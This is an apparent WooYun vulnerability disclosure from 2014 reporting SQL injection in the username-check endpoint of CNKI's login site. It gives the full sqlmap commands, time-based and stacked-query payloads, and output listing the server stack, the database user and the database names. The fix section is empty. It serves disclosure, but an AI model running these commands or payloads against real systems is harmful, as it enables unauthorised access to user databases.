2014-05-10:积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-24:厂商已经主动忽略漏洞,细节向公众公开
中国知网主站SQL注射
详细说明:http://www.cnki.com.cn/
http://www.cnki.net/
这两个站点的"登录"与"注册"都为相同的页面,所以可以判定为主站数据库。
检测用户名是否可用的这条HTTP请求的username参数存在SQL注射。
漏洞证明:
sqlmap.py -u "http://my.cnki.net/elibregister/CheckInfoUnitName.aspx?username=crtest&temp=1399707691804" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=crtest'; WAITFOR DELAY '0:0:5'--&temp=1399707691804
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=crtest' WAITFOR DELAY '0:0:5'--&temp=1399707691804
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'loginuser'
current database: 'CNKILoginDB'
available databases [5]:
[*] CNKILoginDB
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap.py -u "http://my.cnki.net/elibregister/CheckInfoUnitName.aspx?username=crtest&temp=1399707691804" --tables -D CNKILoginDB
time-based跑表很慢,这里只读了几个做证明
修复方案:
:)
版权声明:转载请注明来源 超威蓝猫@乌云 漏洞回应 厂商回应:未能联系到厂商或者厂商积极拒绝